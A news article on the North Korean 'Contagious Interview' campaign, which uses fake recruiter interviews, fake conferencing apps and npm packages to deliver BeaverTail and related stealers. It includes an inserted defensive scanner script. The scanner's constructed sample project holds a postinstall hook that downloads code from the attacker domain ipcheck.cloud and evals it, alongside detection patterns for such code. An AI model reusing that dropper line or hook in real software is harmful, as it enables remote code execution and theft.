North Korean Hackers Exploit Fake Video Conferencing Apps in Ongoing Cyber Campaign

North Korean Hackers Exploit Fake Video Conferencing Apps | CyberPro Magazine


North Korean threat actors have once again targeted unsuspecting job seekers, this time using fake video conferencing apps to breach developer systems as part of a financially motivated campaign tracked as “Contagious Interview.”

Cyber Campaign Targeting Job Seekers with Fake Video Conferencing Apps

A recent report by the Singapore-based cybersecurity firm Group-IB revealed that a North Korean threat group has been using fraudulent Windows video conferencing applications to infiltrate developer systems. This latest attack wave, discovered in mid-August 2024, is part of a larger campaign tracked as “Contagious Interview” (also known as DEV#POPPER), which CrowdStrike attributes to a North Korean actor it calls Famous Chollima.

The attackers pose as job recruiters and invite targets to fake interviews held over fraudulent video conferencing apps. The victims, typically developers looking for work, are tricked into downloading a Node.js project that carries the BeaverTail malware downloader. BeaverTail in turn delivers InvisibleFerret, a cross-platform Python backdoor that gives the operators remote control of the system, logs keystrokes, and steals sensitive data from web browsers.

The group has recently expanded its delivery methods, shipping both Windows and macOS installers for malware disguised as legitimate video conferencing software. Earlier installers mimicked MiroTalk; in July 2024 the group switched to impersonating FreeConference.com. The installers are served from look-alike websites such as freeconference[.]io and mirotalk[.]net, which makes the lure harder for victims to spot.

Expanding Tactics and Targets

According to Group-IB’s findings, the hackers have expanded their operations to job search and freelance platforms such as LinkedIn and Upwork. Once they have made contact with a potential victim, they move the conversation to an encrypted messaging app such as Telegram, where they persuade the target to download a fake video conferencing app or a Node.js project framed as a technical assessment.

The campaign has also been observed injecting malicious JavaScript into cryptocurrency- and gaming-related repositories. The injected code retrieves additional malware from attacker-controlled domains such as ipcheck[.]cloud and regioncheck[.]net. Researchers at Phylum, a software supply chain security firm, have identified the same tactic in npm packages, indicating that the group is spreading its malware through multiple vectors.
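The two delivery paths described above, a recruiter-supplied Node.js project that carries a downloader and JavaScript that fetches further code from staging domains such as ipcheck[.]cloud or regioncheck[.]net, share one practical defence: never run an unknown project before reading it. The following static triage script is an added example, not code from this article, from Group-IB, or from the campaign's own tooling. It flags npm lifecycle hooks that execute automatically during `npm install`, references to the two staging domains printed in this article (even when the domain is split into string pieces), and the combination of a network fetch with dynamic code evaluation. The pattern list, the function names, and the sample "interview task" project are constructed for illustration; the sample is not a real BeaverTail file, and the domain list is only what this article names, not a complete indicator set.

```javascript
// Added example (not the page's, Group-IB's, or the campaign's code): static triage of a
// recruiter-supplied Node.js project before anyone runs `npm install` or `node` on it.
// File contents are held in memory so the example runs offline; in practice you would
// read them from the unpacked project directory.

// Defanged staging domains as printed in the article. ASSUMPTION: illustrative only,
// not an authoritative or complete indicator list.
const IOC_DOMAINS = ['ipcheck.cloud', 'regioncheck.net'];

// npm executes these automatically during `npm install`, so they are the natural
// place for a dropper to hide.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed heuristics: a network fetch plus dynamic evaluation is the "download
// and run" shape; the others are worth a human look on their own.
const SUSPICIOUS_PATTERNS = [
  { name: 'remote-fetch', re: /\b(?:https?\.(?:get|request)|axios\.(?:get|post)|fetch)\s*\(/ },
  { name: 'dynamic-eval', re: /\b(?:eval|new\s+Function)\s*\(/ },
  { name: 'child-process', re: /\b(?:child_process|execSync|spawnSync|exec)\b/ },
  { name: 'hex-or-base64-blob', re: /(?:\\x[0-9a-f]{2}){8,}|Buffer\.from\([^)]*['"](?:base64|hex)['"]\)/i },
];

// Write domains as ipcheck[.]cloud so findings can be pasted safely into a report.
function defang(domain) {
  return domain.replace(/\./g, '[.]');
}

// Build a regex that still matches a domain when its dots are replaced by string
// concatenation ('ipcheck' + '.' + 'cloud') or a hex escape (\x2e).
function looseDomainRegex(domain) {
  return new RegExp(domain.replace(/\./g, '(?:\\\\x2e|[\\s"\'+.])*'), 'i');
}

// Scan a project given as { "relative/path": "file contents" }.
// Returns findings sorted by path and kind so output is deterministic.
function scanProject(files) {
  const findings = [];
  for (const [path, content] of Object.entries(files)) {
    const isManifest = path.endsWith('package.json');
    if (isManifest) {
      let pkg;
      try {
        pkg = JSON.parse(content);
      } catch {
        findings.push({ path, kind: 'unparseable-package-json' });
        continue;
      }
      for (const hook of INSTALL_HOOKS) {
        if (pkg.scripts && typeof pkg.scripts[hook] === 'string') {
          findings.push({ path, kind: 'install-hook', detail: `${hook}: ${pkg.scripts[hook]}` });
        }
      }
    }
    if (!isManifest && !/\.(?:c|m)?js$/.test(path)) continue;
    for (const domain of IOC_DOMAINS) {
      if (looseDomainRegex(domain).test(content)) {
        findings.push({ path, kind: 'ioc-domain', detail: defang(domain) });
      }
    }
    const hits = SUSPICIOUS_PATTERNS.filter(p => p.re.test(content)).map(p => p.name);
    if (hits.includes('remote-fetch') && hits.includes('dynamic-eval')) {
      findings.push({ path, kind: 'fetch-and-eval', detail: hits.join(',') });
    } else if (hits.length) {
      findings.push({ path, kind: 'suspicious-pattern', detail: hits.join(',') });
    }
  }
  return findings.sort((a, b) => a.path.localeCompare(b.path) || a.kind.localeCompare(b.kind));
}

// A known staging domain or a fetch-and-eval pair should stop the project from being
// run at all; anything else goes to a human reviewer.
function verdict(findings) {
  const block = findings.some(f => f.kind === 'ioc-domain' || f.kind === 'fetch-and-eval');
  return block ? 'BLOCK' : findings.length ? 'REVIEW' : 'CLEAN';
}

// Constructed sample project (not a real malware sample): a coding-test lure with a
// postinstall hook and a helper that pulls "config" from a staging domain and evals it.
const SAMPLE_PROJECT = {
  'package.json': JSON.stringify({
    name: 'interview-task',
    scripts: { test: 'node test.js', postinstall: 'node ./lib/setup.js' },
  }),
  'lib/setup.js': [
    "const https = require('https');",
    "const host = 'ipcheck' + '.' + 'cloud';",
    "https.get('https://' + host + '/cfg', r => { let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d)); });",
  ].join('\n'),
  'src/app.js': 'module.exports = (a, b) => a + b;',
};

const sampleFindings = scanProject(SAMPLE_PROJECT);
for (const f of sampleFindings) {
  console.log(`${f.path}: ${f.kind}${f.detail ? ' (' + f.detail + ')' : ''}`);
}
console.log('verdict:', verdict(sampleFindings));
```

A static pass like this is a first filter, not a clearance: obfuscated or staged code can evade string matching, so anything received from an unverified recruiter should still be opened only in a disposable virtual machine with no wallets, credentials, or session cookies on it.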

Another notable development is the enhanced capability of BeaverTail, which now targets a wider range of cryptocurrency wallet browser extensions, including Kaikas, Rabby, and Exodus Web3. The malware also deploys the AnyDesk remote-access tool to maintain persistence on compromised systems. Together these changes show that the group is continually improving its tooling and finding more effective ways to steal sensitive information.

FBI Warning and Evolving Cyber Threats

As part of the ongoing campaign, the hackers have also added a new toolset, CivetQ, a set of Python scripts that steals data from a wide range of applications, including web browsers and even Microsoft Sticky Notes. CivetQ extracts cookies and other data held in unencrypted application databases, captures keystrokes and clipboard content, and harvests data from 74 different browser extensions.

Security researcher Sharmine Low from Group-IB emphasized that the campaign is under constant refinement, with the threat actors frequently updating their tools and expanding their reach across multiple platforms. Low noted, “Lazarus has upgraded their tactics, upgraded their tools, and found better ways to conceal their activities. Their attacks have become increasingly creative.”

In light of these developments, the U.S. Federal Bureau of Investigation (FBI) has warned that North Korean cyber actors are targeting the cryptocurrency industry with sophisticated social engineering schemes, using professional networking platforms to identify and compromise their victims. The FBI also noted that these actors are particularly focused on decentralized finance (DeFi) businesses, attempting to gain unauthorized access to company networks through elaborate social engineering.

As this campaign continues to evolve, cybersecurity experts urge individuals and organizations to remain vigilant, particularly when engaging in job searches or interacting with cryptocurrency platforms.
